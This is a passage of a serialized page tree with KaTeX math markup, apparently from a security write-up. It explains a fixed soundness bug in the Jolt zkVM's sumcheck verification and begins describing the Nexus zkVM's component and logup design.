",{"type":25,"tag":82,"props":119487,"children":119489},{"className":119488},[212,4702],[119490],{"type":25,"tag":216,"props":119491,"children":119493},{"className":119492},[224],[119494],{"type":25,"tag":216,"props":119495,"children":119497},{"className":119496,"ariaHidden":230},[229],[119498],{"type":25,"tag":216,"props":119499,"children":119501},{"className":119500},[235],[119502,119506],{"type":25,"tag":216,"props":119503,"children":119505},{"className":119504,"style":4719},[240],[],{"type":25,"tag":216,"props":119507,"children":119509},{"className":119508},[246],[119510,119515],{"type":25,"tag":216,"props":119511,"children":119513},{"className":119512,"style":2679},[246,2151],[119514],{"type":31,"value":2682},{"type":25,"tag":216,"props":119516,"children":119518},{"className":119517},[2159],[119519],{"type":25,"tag":216,"props":119520,"children":119522},{"className":119521},[298,299],[119523,119552],{"type":25,"tag":216,"props":119524,"children":119526},{"className":119525},[304],[119527,119547],{"type":25,"tag":216,"props":119528,"children":119530},{"className":119529,"style":2270},[309],[119531],{"type":25,"tag":216,"props":119532,"children":119533},{"style":2702},[119534,119538],{"type":25,"tag":216,"props":119535,"children":119537},{"className":119536,"style":2181},[319],[],{"type":25,"tag":216,"props":119539,"children":119541},{"className":119540},[2186,2187,2188,2189],[119542],{"type":25,"tag":216,"props":119543,"children":119545},{"className":119544},[246,2151,2189],[119546],{"type":31,"value":2289},{"type":25,"tag":216,"props":119548,"children":119550},{"className":119549},[408],[119551],{"type":31,"value":411},{"type":25,"tag":216,"props":119553,"children":119555},{"className":119554},[304],[119556],{"type":25,"tag":216,"props":119557,"children":119559},{"className":119558,"style":2209},[309],[119560],{"type":25,"tag":216,"props":119561,"children":119562},{},[],{"type":31,"value":1472},{"type":25,"tag":38,"props":119565,"children":119566},{},[119567],{"type":25,"tag":82,"props":119568,"children":119570},{"className":119569},[212,4702],[119571],{"type":25,"tag":216,"props":119572,"children":119574},{"className":119573},[224],[119575],{"type":25,"tag":216,"props":119576,"children":119578},{"className":119577,"ariaHidden":230},[229],[119579,119609,119750],{"type":25,"tag":216,"props":119580,"children":119582},{"className":119581},[235],[119583,119587,119596,119600,119605],{"type":25,"tag":216,"props":119584,"children":119586},{"className":119585,"style":96933},[240],[],{"type":25,"tag":216,"props":119588,"children":119590},{"className":119589},[246,31],[119591],{"type":25,"tag":216,"props":119592,"children":119594},{"className":119593},[246],[119595],{"type":31,"value":119483},{"type":25,"tag":216,"props":119597,"children":119599},{"className":119598,"style":258},[257],[],{"type":25,"tag":216,"props":119601,"children":119603},{"className":119602},[263],[119604],{"type":31,"value":266},{"type":25,"tag":216,"props":119606,"children":119608},{"className":119607,"style":258},[257],[],{"type":25,"tag":216,"props":119610,"children":119612},{"className":119611},[235],[119613,119618,119675,119679,119737,119741,119746],{"type":25,"tag":216,"props":119614,"children":119617},{"className":119615,"style":119616},[240],"height:1.0497em;vertical-align:-0.2997em;",[],{"type":25,"tag":216,"props":119619,"children":119621},{"className":119620},[1841],[119622,119627],{"type":25,"tag":216,"props":119623,"children":119625},{"className":119624,"style":25584},[1841,4048,25583],[119626],{"type":31,"value":4052},{"type":25,"tag":216,"props":119628,"children":119630},{"className":119629},[2159],[119631],{"type":25,"tag":216,"props":119632,"children":119634},{"className":119633},[298,299],[119635,119664],{"type":25,"tag":216,"props":119636,"children":119638},{"className":119637},[304],[119639,119659],{"type":25,"tag":216,"props":119640,"children":119642},{"className":119641,"style":118191},[309],[119643],{"type":25,"tag":216,"props":119644,"children":119645},{"style":25607},[119646,119650],{"type":25,"tag":216,"props":119647,"children":119649},{"className":119648,"style":2181},[319],[],{"type":25,"tag":216,"props":119651,"children":119653},{"className":119652},[2186,2187,2188,2189],[119654],{"type":25,"tag":216,"props":119655,"children":119657},{"className":119656},[246,2151,2189],[119658],{"type":31,"value":2289},{"type":25,"tag":216,"props":119660,"children":119662},{"className":119661},[408],[119663],{"type":31,"value":411},{"type":25,"tag":216,"props":119665,"children":119667},{"className":119666},[304],[119668],{"type":25,"tag":216,"props":119669,"children":119671},{"className":119670,"style":118471},[309],[119672],{"type":25,"tag":216,"props":119673,"children":119674},{},[],{"type":25,"tag":216,"props":119676,"children":119678},{"className":119677,"style":1871},[257],[],{"type":25,"tag":216,"props":119680,"children":119682},{"className":119681},[246],[119683,119688],{"type":25,"tag":216,"props":119684,"children":119686},{"className":119685,"style":119071},[246,2151],[119687],{"type":31,"value":119074},{"type":25,"tag":216,"props":119689,"children":119691},{"className":119690},[2159],[119692],{"type":25,"tag":216,"props":119693,"children":119695},{"className":119694},[298,299],[119696,119726],{"type":25,"tag":216,"props":119697,"children":119699},{"className":119698},[304],[119700,119721],{"type":25,"tag":216,"props":119701,"children":119703},{"className":119702,"style":2270},[309],[119704],{"type":25,"tag":216,"props":119705,"children":119707},{"style":119706},"top:-2.55em;margin-left:-0.0037em;margin-right:0.05em;",[119708,119712],{"type":25,"tag":216,"props":119709,"children":119711},{"className":119710,"style":2181},[319],[],{"type":25,"tag":216,"props":119713,"children":119715},{"className":119714},[2186,2187,2188,2189],[119716],{"type":25,"tag":216,"props":119717,"children":119719},{"className":119718},[246,2151,2189],[119720],{"type":31,"value":2289},{"type":25,"tag":216,"props":119722,"children":119724},{"className":119723},[408],[119725],{"type":31,"value":411},{"type":25,"tag":216,"props":119727,"children":119729},{"className":119728},[304],[119730],{"type":25,"tag":216,"props":119731,"children":119733},{"className":119732,"style":2209},[309],[119734],{"type":25,"tag":216,"props":119735,"children":119736},{},[],{"type":25,"tag":216,"props":119738,"children":119740},{"className":119739,"style":335},[257],[],{"type":25,"tag":216,"props":119742,"children":119744},{"className":119743},[340],[119745],{"type":31,"value":343},{"type":25,"tag":216,"props":119747,"children":119749},{"className":119748,"style":335},[257],[],{"type":25,"tag":216,"props":119751,"children":119753},{"className":119752},[235],[119754,119758],{"type":25,"tag":216,"props":119755,"children":119757},{"className":119756,"style":4719},[240],[],{"type":25,"tag":216,"props":119759,"children":119761},{"className":119760},[246],[119762,119767],{"type":25,"tag":216,"props":119763,"children":119765},{"className":119764,"style":2679},[246,2151],[119766],{"type":31,"value":2682},{"type":25,"tag":216,"props":119768,"children":119770},{"className":119769},[2159],[119771],{"type":25,"tag":216,"props":119772,"children":119774},{"className":119773},[298,299],[119775,119804],{"type":25,"tag":216,"props":119776,"children":119778},{"className":119777},[304],[119779,119799],{"type":25,"tag":216,"props":119780,"children":119782},{"className":119781,"style":2270},[309],[119783],{"type":25,"tag":216,"props":119784,"children":119785},{"style":2702},[119786,119790],{"type":25,"tag":216,"props":119787,"children":119789},{"className":119788,"style":2181},[319],[],{"type":25,"tag":216,"props":119791,"children":119793},{"className":119792},[2186,2187,2188,2189],[119794],{"type":25,"tag":216,"props":119795,"children":119797},{"className":119796},[246,2151,2189],[119798],{"type":31,"value":2289},{"type":25,"tag":216,"props":119800,"children":119802},{"className":119801},[408],[119803],{"type":31,"value":411},{"type":25,"tag":216,"props":119805,"children":119807},{"className":119806},[304],[119808],{"type":25,"tag":216,"props":119809,"children":119811},{"className":119810,"style":2209},[309],[119812],{"type":25,"tag":216,"props":119813,"children":119814},{},[],{"type":25,"tag":38,"props":119816,"children":119817},{},[119818,119820,119897,119899,119904,119906,119983,119985,120062,120064,120141],{"type":31,"value":119819},"where ",{"type":25,"tag":82,"props":119821,"children":119823},{"className":119822},[212,4702],[119824],{"type":25,"tag":216,"props":119825,"children":119827},{"className":119826},[224],[119828],{"type":25,"tag":216,"props":119829,"children":119831},{"className":119830,"ariaHidden":230},[229],[119832],{"type":25,"tag":216,"props":119833,"children":119835},{"className":119834},[235],[119836,119840],{"type":25,"tag":216,"props":119837,"children":119839},{"className":119838,"style":4827},[240],[],{"type":25,"tag":216,"props":119841,"children":119843},{"className":119842},[246],[119844,119849],{"type":25,"tag":216,"props":119845,"children":119847},{"className":119846,"style":119071},[246,2151],[119848],{"type":31,"value":119074},{"type":25,"tag":216,"props":119850,"children":119852},{"className":119851},[2159],[119853],{"type":25,"tag":216,"props":119854,"children":119856},{"className":119855},[298,299],[119857,119886],{"type":25,"tag":216,"props":119858,"children":119860},{"className":119859},[304],[119861,119881],{"type":25,"tag":216,"props":119862,"children":119864},{"className":119863,"style":2270},[309],[119865],{"type":25,"tag":216,"props":119866,"children":119867},{"style":119706},[119868,119872],{"type":25,"tag":216,"props":119869,"children":119871},{"className":119870,"style":2181},[319],[],{"type":25,"tag":216,"props":119873,"children":119875},{"className":119874},[2186,2187,2188,2189],[119876],{"type":25,"tag":216,"props":119877,"children":119879},{"className":119878},[246,2151,2189],[119880],{"type":31,"value":2289},{"type":25,"tag":216,"props":119882,"children":119884},{"className":119883},[408],[119885],{"type":31,"value":411},{"type":25,"tag":216,"props":119887,"children":119889},{"className":119888},[304],[119890],{"type":25,"tag":216,"props":119891,"children":119893},{"className":119892,"style":2209},[309],[119894],{"type":25,"tag":216,"props":119895,"children":119896},{},[],{"type":31,"value":119898}," are random coefficients derived from the transcript. Since ",{"type":25,"tag":82,"props":119900,"children":119902},{"className":119901},[],[119903],{"type":31,"value":119447},{"type":31,"value":119905}," (containing ",{"type":25,"tag":82,"props":119907,"children":119909},{"className":119908},[212,4702],[119910],{"type":25,"tag":216,"props":119911,"children":119913},{"className":119912},[224],[119914],{"type":25,"tag":216,"props":119915,"children":119917},{"className":119916,"ariaHidden":230},[229],[119918],{"type":25,"tag":216,"props":119919,"children":119921},{"className":119920},[235],[119922,119926],{"type":25,"tag":216,"props":119923,"children":119925},{"className":119924,"style":4719},[240],[],{"type":25,"tag":216,"props":119927,"children":119929},{"className":119928},[246],[119930,119935],{"type":25,"tag":216,"props":119931,"children":119933},{"className":119932,"style":2679},[246,2151],[119934],{"type":31,"value":2682},{"type":25,"tag":216,"props":119936,"children":119938},{"className":119937},[2159],[119939],{"type":25,"tag":216,"props":119940,"children":119942},{"className":119941},[298,299],[119943,119972],{"type":25,"tag":216,"props":119944,"children":119946},{"className":119945},[304],[119947,119967],{"type":25,"tag":216,"props":119948,"children":119950},{"className":119949,"style":2270},[309],[119951],{"type":25,"tag":216,"props":119952,"children":119953},{"style":2702},[119954,119958],{"type":25,"tag":216,"props":119955,"children":119957},{"className":119956,"style":2181},[319],[],{"type":25,"tag":216,"props":119959,"children":119961},{"className":119960},[2186,2187,2188,2189],[119962],{"type":25,"tag":216,"props":119963,"children":119965},{"className":119964},[246,2151,2189],[119966],{"type":31,"value":2289},{"type":25,"tag":216,"props":119968,"children":119970},{"className":119969},[408],[119971],{"type":31,"value":411},{"type":25,"tag":216,"props":119973,"children":119975},{"className":119974},[304],[119976],{"type":25,"tag":216,"props":119977,"children":119979},{"className":119978,"style":2209},[309],[119980],{"type":25,"tag":216,"props":119981,"children":119982},{},[],{"type":31,"value":119984},") were not in the transcript, the ",{"type":25,"tag":82,"props":119986,"children":119988},{"className":119987},[212,4702],[119989],{"type":25,"tag":216,"props":119990,"children":119992},{"className":119991},[224],[119993],{"type":25,"tag":216,"props":119994,"children":119996},{"className":119995,"ariaHidden":230},[229],[119997],{"type":25,"tag":216,"props":119998,"children":120000},{"className":119999},[235],[120001,120005],{"type":25,"tag":216,"props":120002,"children":120004},{"className":120003,"style":4827},[240],[],{"type":25,"tag":216,"props":120006,"children":120008},{"className":120007},[246],[120009,120014],{"type":25,"tag":216,"props":120010,"children":120012},{"className":120011,"style":119071},[246,2151],[120013],{"type":31,"value":119074},{"type":25,"tag":216,"props":120015,"children":120017},{"className":120016},[2159],[120018],{"type":25,"tag":216,"props":120019,"children":120021},{"className":120020},[298,299],[120022,120051],{"type":25,"tag":216,"props":120023,"children":120025},{"className":120024},[304],[120026,120046],{"type":25,"tag":216,"props":120027,"children":120029},{"className":120028,"style":2270},[309],[120030],{"type":25,"tag":216,"props":120031,"children":120032},{"style":119706},[120033,120037],{"type":25,"tag":216,"props":120034,"children":120036},{"className":120035,"style":2181},[319],[],{"type":25,"tag":216,"props":120038,"children":120040},{"className":120039},[2186,2187,2188,2189],[120041],{"type":25,"tag":216,"props":120042,"children":120044},{"className":120043},[246,2151,2189],[120045],{"type":31,"value":2289},{"type":25,"tag":216,"props":120047,"children":120049},{"className":120048},[408],[120050],{"type":31,"value":411},{"type":25,"tag":216,"props":120052,"children":120054},{"className":120053},[304],[120055],{"type":25,"tag":216,"props":120056,"children":120058},{"className":120057,"style":2209},[309],[120059],{"type":25,"tag":216,"props":120060,"children":120061},{},[],{"type":31,"value":120063}," values are independent of ",{"type":25,"tag":82,"props":120065,"children":120067},{"className":120066},[212,4702],[120068],{"type":25,"tag":216,"props":120069,"children":120071},{"className":120070},[224],[120072],{"type":25,"tag":216,"props":120073,"children":120075},{"className":120074,"ariaHidden":230},[229],[120076],{"type":25,"tag":216,"props":120077,"children":120079},{"className":120078},[235],[120080,120084],{"type":25,"tag":216,"props":120081,"children":120083},{"className":120082,"style":4719},[240],[],{"type":25,"tag":216,"props":120085,"children":120087},{"className":120086},[246],[120088,120093],{"type":25,"tag":216,"props":120089,"children":120091},{"className":120090,"style":2679},[246,2151],[120092],{"type":31,"value":2682},{"type":25,"tag":216,"props":120094,"children":120096},{"className":120095},[2159],[120097],{"type":25,"tag":216,"props":120098,"children":120100},{"className":120099},[298,299],[120101,120130],{"type":25,"tag":216,"props":120102,"children":120104},{"className":120103},[304],[120105,120125],{"type":25,"tag":216,"props":120106,"children":120108},{"className":120107,"style":2270},[309],[120109],{"type":25,"tag":216,"props":120110,"children":120111},{"style":2702},[120112,120116],{"type":25,"tag":216,"props":120113,"children":120115},{"className":120114,"style":2181},[319],[],{"type":25,"tag":216,"props":120117,"children":120119},{"className":120118},[2186,2187,2188,2189],[120120],{"type":25,"tag":216,"props":120121,"children":120123},{"className":120122},[246,2151,2189],[120124],{"type":31,"value":2289},{"type":25,"tag":216,"props":120126,"children":120128},{"className":120127},[408],[120129],{"type":31,"value":411},{"type":25,"tag":216,"props":120131,"children":120133},{"className":120132},[304],[120134],{"type":25,"tag":216,"props":120135,"children":120137},{"className":120136,"style":2209},[309],[120138],{"type":25,"tag":216,"props":120139,"children":120140},{},[],{"type":31,"value":179},{"type":25,"tag":38,"props":120143,"children":120144},{},[120145],{"type":25,"tag":9273,"props":120146,"children":120147},{},[120148],{"type":31,"value":120149},"Why it's linear:",{"type":25,"tag":38,"props":120151,"children":120152},{},[120153,120155],{"type":31,"value":120154},"Due to the compression optimization (prover omits one less coefficient per round), the final verification equation traces back through the rounds and becomes linear in the input claim ",{"type":25,"tag":82,"props":120156,"children":120158},{"className":120157},[212,4702],[120159],{"type":25,"tag":216,"props":120160,"children":120162},{"className":120161},[224],[120163],{"type":25,"tag":216,"props":120164,"children":120166},{"className":120165,"ariaHidden":230},[229],[120167],{"type":25,"tag":216,"props":120168,"children":120170},{"className":120169},[235],[120171,120175],{"type":25,"tag":216,"props":120172,"children":120174},{"className":120173,"style":4799},[240],[],{"type":25,"tag":216,"props":120176,"children":120178},{"className":120177,"style":2679},[246,2151],[120179],{"type":31,"value":2682},{"type":25,"tag":38,"props":120181,"children":120182},{},[120183],{"type":25,"tag":82,"props":120184,"children":120186},{"className":120185},[212,4702],[120187],{"type":25,"tag":216,"props":120188,"children":120190},{"className":120189},[224],[120191],{"type":25,"tag":216,"props":120192,"children":120194},{"className":120193,"ariaHidden":230},[229],[120195,120285,120311,120337],{"type":25,"tag":216,"props":120196,"children":120198},{"className":120197},[235],[120199,120203,120272,120276,120281],{"type":25,"tag":216,"props":120200,"children":120202},{"className":120201,"style":4719},[240],[],{"type":25,"tag":216,"props":120204,"children":120206},{"className":120205},[246],[120207,120213],{"type":25,"tag":216,"props":120208,"children":120210},{"className":120209,"style":26065},[246,2151],[120211],{"type":31,"value":120212},"C",{"type":25,"tag":216,"props":120214,"children":120216},{"className":120215},[2159],[120217],{"type":25,"tag":216,"props":120218,"children":120220},{"className":120219},[298,299],[120221,120261],{"type":25,"tag":216,"props":120222,"children":120224},{"className":120223},[304],[120225,120256],{"type":25,"tag":216,"props":120226,"children":120229},{"className":120227,"style":120228},[309],"height:0.3361em;",[120230],{"type":25,"tag":216,"props":120231,"children":120233},{"style":120232},"top:-2.55em;margin-left:-0.0715em;margin-right:0.05em;",[120234,120238],{"type":25,"tag":216,"props":120235,"children":120237},{"className":120236,"style":2181},[319],[],{"type":25,"tag":216,"props":120239,"children":120241},{"className":120240},[2186,2187,2188,2189],[120242],{"type":25,"tag":216,"props":120243,"children":120245},{"className":120244},[246,2189],[120246],{"type":25,"tag":216,"props":120247,"children":120249},{"className":120248},[246,31,2189],[120250],{"type":25,"tag":216,"props":120251,"children":120253},{"className":120252},[246,2189],[120254],{"type":31,"value":120255},"final",{"type":25,"tag":216,"props":120257,"children":120259},{"className":120258},[408],[120260],{"type":31,"value":411},{"type":25,"tag":216,"props":120262,"children":120264},{"className":120263},[304],[120265],{"type":25,"tag":216,"props":120266,"children":120268},{"className":120267,"style":2209},[309],[120269],{"type":25,"tag":216,"props":120270,"children":120271},{},[],{"type":25,"tag":216,"props":120273,"children":120275},{"className":120274,"style":258},[257],[],{"type":25,"tag":216,"props":120277,"children":120279},{"className":120278},[263],[120280],{"type":31,"value":266},{"type":25,"tag":216,"props":120282,"children":120284},{"className":120283,"style":258},[257],[],{"type":25,"tag":216,"props":120286,"children":120288},{"className":120287},[235],[120289,120293,120298,120302,120307],{"type":25,"tag":216,"props":120290,"children":120292},{"className":120291,"style":119066},[240],[],{"type":25,"tag":216,"props":120294,"children":120296},{"className":120295},[246,2151],[120297],{"type":31,"value":162},{"type":25,"tag":216,"props":120299,"children":120301},{"className":120300,"style":335},[257],[],{"type":25,"tag":216,"props":120303,"children":120305},{"className":120304},[340],[120306],{"type":31,"value":343},{"type":25,"tag":216,"props":120308,"children":120310},{"className":120309,"style":335},[257],[],{"type":25,"tag":216,"props":120312,"children":120314},{"className":120313},[235],[120315,120319,120324,120328,120333],{"type":25,"tag":216,"props":120316,"children":120318},{"className":120317,"style":119095},[240],[],{"type":25,"tag":216,"props":120320,"children":120322},{"className":120321,"style":2679},[246,2151],[120323],{"type":31,"value":2682},{"type":25,"tag":216,"props":120325,"children":120327},{"className":120326,"style":335},[257],[],{"type":25,"tag":216,"props":120329,"children":120331},{"className":120330},[340],[120332],{"type":31,"value":3539},{"type":25,"tag":216,"props":120334,"children":120336},{"className":120335,"style":335},[257],[],{"type":25,"tag":216,"props":120338,"children":120340},{"className":120339},[235],[120341,120345],{"type":25,"tag":216,"props":120342,"children":120344},{"className":120343,"style":96933},[240],[],{"type":25,"tag":216,"props":120346,"children":120348},{"className":120347},[246,2151],[120349],{"type":31,"value":7171},{"type":25,"tag":38,"props":120351,"children":120352},{},[120353,120354,120393,120395,120420,120422,120552,120554,120675],{"type":31,"value":119819},{"type":25,"tag":82,"props":120355,"children":120357},{"className":120356},[212,4702],[120358],{"type":25,"tag":216,"props":120359,"children":120361},{"className":120360},[224],[120362],{"type":25,"tag":216,"props":120363,"children":120365},{"className":120364,"ariaHidden":230},[229],[120366],{"type":25,"tag":216,"props":120367,"children":120369},{"className":120368},[235],[120370,120374,120379,120384,120388],{"type":25,"tag":216,"props":120371,"children":120373},{"className":120372,"style":1519},[240],[],{"type":25,"tag":216,"props":120375,"children":120377},{"className":120376},[246,2151],[120378],{"type":31,"value":162},{"type":25,"tag":216,"props":120380,"children":120382},{"className":120381},[1864],[120383],{"type":31,"value":1867},{"type":25,"tag":216,"props":120385,"children":120387},{"className":120386,"style":1871},[257],[],{"type":25,"tag":216,"props":120389,"children":120391},{"className":120390},[246,2151],[120392],{"type":31,"value":7171},{"type":31,"value":120394}," are determined by the transcript (independent of ",{"type":25,"tag":82,"props":120396,"children":120398},{"className":120397},[212,4702],[120399],{"type":25,"tag":216,"props":120400,"children":120402},{"className":120401},[224],[120403],{"type":25,"tag":216,"props":120404,"children":120406},{"className":120405,"ariaHidden":230},[229],[120407],{"type":25,"tag":216,"props":120408,"children":120410},{"className":120409},[235],[120411,120415],{"type":25,"tag":216,"props":120412,"children":120414},{"className":120413,"style":4799},[240],[],{"type":25,"tag":216,"props":120416,"children":120418},{"className":120417,"style":2679},[246,2151],[120419],{"type":31,"value":2682},{"type":31,"value":120421},"). The verifier checks that ",{"type":25,"tag":82,"props":120423,"children":120425},{"className":120424},[212,4702],[120426],{"type":25,"tag":216,"props":120427,"children":120429},{"className":120428},[224],[120430],{"type":25,"tag":216,"props":120431,"children":120433},{"className":120432,"ariaHidden":230},[229],[120434,120520],{"type":25,"tag":216,"props":120435,"children":120437},{"className":120436},[235],[120438,120442,120507,120511,120516],{"type":25,"tag":216,"props":120439,"children":120441},{"className":120440,"style":4719},[240],[],{"type":25,"tag":216,"props":120443,"children":120445},{"className":120444},[246],[120446,120451],{"type":25,"tag":216,"props":120447,"children":120449},{"className":120448,"style":26065},[246,2151],[120450],{"type":31,"value":120212},{"type":25,"tag":216,"props":120452,"children":120454},{"className":120453},[2159],[120455],{"type":25,"tag":216,"props":120456,"children":120458},{"className":120457},[298,299],[120459,120496],{"type":25,"tag":216,"props":120460,"children":120462},{"className":120461},[304],[120463,120491],{"type":25,"tag":216,"props":120464,"children":120466},{"className":120465,"style":120228},[309],[120467],{"type":25,"tag":216,"props":120468,"children":120469},{"style":120232},[120470,120474],{"type":25,"tag":216,"props":120471,"children":120473},{"className":120472,"style":2181},[319],[],{"type":25,"tag":216,"props":120475,"children":120477},{"className":120476},[2186,2187,2188,2189],[120478],{"type":25,"tag":216,"props":120479,"children":120481},{"className":120480},[246,2189],[120482],{"type":25,"tag":216,"props":120483,"children":120485},{"className":120484},[246,31,2189],[120486],{"type":25,"tag":216,"props":120487,"children":120489},{"className":120488},[246,2189],[120490],{"type":31,"value":120255},{"type":25,"tag":216,"props":120492,"children":120494},{"className":120493},[408],[120495],{"type":31,"value":411},{"type":25,"tag":216,"props":120497,"children":120499},{"className":120498},[304],[120500],{"type":25,"tag":216,"props":120501,"children":120503},{"className":120502,"style":2209},[309],[120504],{"type":25,"tag":216,"props":120505,"children":120506},{},[],{"type":25,"tag":216,"props":120508,"children":120510},{"className":120509,"style":258},[257],[],{"type":25,"tag":216,"props":120512,"children":120514},{"className":120513},[263],[120515],{"type":31,"value":266},{"type":25,"tag":216,"props":120517,"children":120519},{"className":120518,"style":258},[257],[],{"type":25,"tag":216,"props":120521,"children":120523},{"className":120522},[235],[120524,120528,120538,120543],{"type":25,"tag":216,"props":120525,"children":120527},{"className":120526,"style":241},[240],[],{"type":25,"tag":216,"props":120529,"children":120531},{"className":120530},[246,31],[120532],{"type":25,"tag":216,"props":120533,"children":120535},{"className":120534},[246],[120536],{"type":31,"value":120537},"expected",{"type":25,"tag":216,"props":120539,"children":120541},{"className":120540,"style":2752},[246],[120542],{"type":31,"value":7031},{"type":25,"tag":216,"props":120544,"children":120546},{"className":120545},[246,31],[120547],{"type":25,"tag":216,"props":120548,"children":120550},{"className":120549},[246],[120551],{"type":31,"value":41511},{"type":31,"value":120553}," (from PCS opening), this becomes ",{"type":25,"tag":82,"props":120555,"children":120557},{"className":120556},[212,4702],[120558],{"type":25,"tag":216,"props":120559,"children":120561},{"className":120560},[224],[120562],{"type":25,"tag":216,"props":120563,"children":120565},{"className":120564,"ariaHidden":230},[229],[120566,120592,120618,120644],{"type":25,"tag":216,"props":120567,"children":120569},{"className":120568},[235],[120570,120574,120579,120583,120588],{"type":25,"tag":216,"props":120571,"children":120573},{"className":120572,"style":119066},[240],[],{"type":25,"tag":216,"props":120575,"children":120577},{"className":120576},[246,2151],[120578],{"type":31,"value":162},{"type":25,"tag":216,"props":120580,"children":120582},{"className":120581,"style":335},[257],[],{"type":25,"tag":216,"props":120584,"children":120586},{"className":120585},[340],[120587],{"type":31,"value":343},{"type":25,"tag":216,"props":120589,"children":120591},{"className":120590,"style":335},[257],[],{"type":25,"tag":216,"props":120593,"children":120595},{"className":120594},[235],[120596,120600,120605,120609,120614],{"type":25,"tag":216,"props":120597,"children":120599},{"className":120598,"style":119095},[240],[],{"type":25,"tag":216,"props":120601,"children":120603},{"className":120602,"style":2679},[246,2151],[120604],{"type":31,"value":2682},{"type":25,"tag":216,"props":120606,"children":120608},{"className":120607,"style":335},[257],[],{"type":25,"tag":216,"props":120610,"children":120612},{"className":120611},[340],[120613],{"type":31,"value":3539},{"type":25,"tag":216,"props":120615,"children":120617},{"className":120616,"style":335},[257],[],{"type":25,"tag":216,"props":120619,"children":120621},{"className":120620},[235],[120622,120626,120631,120635,120640],{"type":25,"tag":216,"props":120623,"children":120625},{"className":120624,"style":96933},[240],[],{"type":25,"tag":216,"props":120627,"children":120629},{"className":120628},[246,2151],[120630],{"type":31,"value":7171},{"type":25,"tag":216,"props":120632,"children":120634},{"className":120633,"style":258},[257],[],{"type":25,"tag":216,"props":120636,"children":120638},{"className":120637},[263],[120639],{"type":31,"value":266},{"type":25,"tag":216,"props":120641,"children":120643},{"className":120642,"style":258},[257],[],{"type":25,"tag":216,"props":120645,"children":120647},{"className":120646},[235],[120648,120652,120661,120666],{"type":25,"tag":216,"props":120649,"children":120651},{"className":120650,"style":241},[240],[],{"type":25,"tag":216,"props":120653,"children":120655},{"className":120654},[246,31],[120656],{"type":25,"tag":216,"props":120657,"children":120659},{"className":120658},[246],[120660],{"type":31,"value":120537},{"type":25,"tag":216,"props":120662,"children":120664},{"className":120663,"style":2752},[246],[120665],{"type":31,"value":7031},{"type":25,"tag":216,"props":120667,"children":120669},{"className":120668},[246,31],[120670],{"type":25,"tag":216,"props":120671,"children":120673},{"className":120672},[246],[120674],{"type":31,"value":41511},{"type":31,"value":179},{"type":25,"tag":38,"props":120677,"children":120678},{},[120679],{"type":31,"value":120680},"Because multiple claims are coupled across verification stages, the attacker may need to adjust a small set of claim values simultaneously to satisfy all affected constraints.",{"type":25,"tag":38,"props":120682,"children":120683},{},[120684],{"type":31,"value":120685},"This can be exploited by solving a small linear system over a handful of unbound claim values so all affected checks pass simultaneously.",{"type":25,"tag":38,"props":120687,"children":120688},{},[120689,120694,120696],{"type":25,"tag":9273,"props":120690,"children":120691},{},[120692],{"type":31,"value":120693},"Status:",{"type":31,"value":120695}," Fixed on October 3, 2025 via ",{"type":25,"tag":162,"props":120697,"children":120700},{"href":120698,"rel":120699},"https://github.com/a16z/jolt/pull/981",[166],[120701],{"type":31,"value":120702},"PR #981",{"type":25,"tag":22753,"props":120704,"children":120705},{},[],{"type":25,"tag":606,"props":120707,"children":120709},{"id":120708},"nexus",[120710],{"type":31,"value":111824},{"type":25,"tag":38,"props":120712,"children":120713},{},[120714],{"type":31,"value":120715},"Nexus is a zkVM built on the Stwo prover (from StarkWare). It uses STARKs with logup lookup arguments.",{"type":25,"tag":38,"props":120717,"children":120718},{},[120719,120721,120726],{"type":31,"value":120720},"Nexus splits verification into ",{"type":25,"tag":9273,"props":120722,"children":120723},{},[120724],{"type":31,"value":120725},"components",{"type":31,"value":120727}," such as instruction execution, memory, registers, etc. Each component handles a subset of constraints.",{"type":25,"tag":38,"props":120729,"children":120730},{},[120731,120733,120738],{"type":31,"value":120732},"Each component emits and consumes lookup tuples. The component's ",{"type":25,"tag":82,"props":120734,"children":120736},{"className":120735},[],[120737],{"type":31,"value":118848},{"type":31,"value":120739}," summarizes its net contribution:",{"type":25,"tag":38,"props":120741,"children":120742},{},[120743],{"type":25,"tag":82,"props":120744,"children":120746},{"className":120745},[212,4702],[120747],{"type":25,"tag":216,"props":120748,"children":120750},{"className":120749},[224],[120751],{"type":25,"tag":216,"props":120752,"children":120754},{"className":120753,"ariaHidden":230},[229],[120755,120851,121100],{"type":25,"tag":216,"props":120756,"children":120758},{"className":120757},[235],[120759,120763,120772,120777,120838,120842,120847],{"type":25,"tag":216,"props":120760,"children":120762},{"className":120761,"style":241},[240],[],{"type":25,"tag":216,"props":120764,"children":120766},{"className":120765},[246,31],[120767],{"type":25,"tag":216,"props":120768,"children":120770},{"className":120769},[246],[120771],{"type":31,"value":118077},{"type":25,"tag":216,"props":120773,"children":120775},{"className":120774,"style":2752},[246],[120776],{"type":31,"value":7031},{"type":25,"tag":216,"props":120778,"children":120780},{"className":120779},[246],[120781,120790],{"type":25,"tag":216,"props":120782,"children":120784},{"className":120783},[246,31],[120785],{"type":25,"tag":216,"props":120786,"children":120788},{"className":120787},[246],[120789],{"type":31,"value":80604},{"type":25,"tag":216,"props":120791,"children":120793},{"className":120792},[2159],[120794],{"type":25,"tag":216,"props":120795,"children":120797},{"className":120796},[298,299],[120798,120827],{"type":25,"tag":216,"props":120799,"children":120801},{"className":120800},[304],[120802,120822],{"type":25,"tag":216,"props":120803,"children":120805},{"className":120804,"style":2270},[309],[120806],{"type":25,"tag":216,"props":120807,"children":120808},{"style":118114},[120809,120813],{"type":25,"tag":216,"props":120810,"children":120812},{"className":120811,"style":2181},[319],[],{"type":25,"tag":216,"props":120814,"children":120816},{"className":120815},[2186,2187,2188,2189],[120817],{"type":25,"tag":216,"props":120818,"children":120820},{"className":120819},[246,2151,2189],[120821],{"type":31,"value":2289},{"type":25,"tag":216,"props":120823,"children":120825},{"className":120824},[408],[120826],{"type":31,"value":411},{"type":25,"tag":216,"props":120828,"children":120830},{"className":120829},[304],[120831],{"type":25,"tag":216,"props":120832,"children":120834},{"className":120833,"style":2209},[309],[120835],{"type":25,"tag":216,"props":120836,"children":120837},{},[],{"type":25,"tag":216,"props":120839,"children":120841},{"className":120840,"style":258},[257],[],{"type":25,"tag":216,"props":120843,"children":120845},{"className":120844},[263],[120846],{"type":31,"value":266},{"type":25,"tag":216,"props":120848,"children":120850},{"className":120849,"style":258},[257],[],{"type":25,"tag":216,"props":120852,"children":120854},{"className":120853},[235],[120855,120860,120917,120921,121087,121091,121096],{"type":25,"tag":216,"props":120856,"children":120859},{"className":120857,"style":120858},[240],"height:1.4734em;vertical-align:-0.6283em;",[],{"type":25,"tag":216,"props":120861,"children":120863},{"className":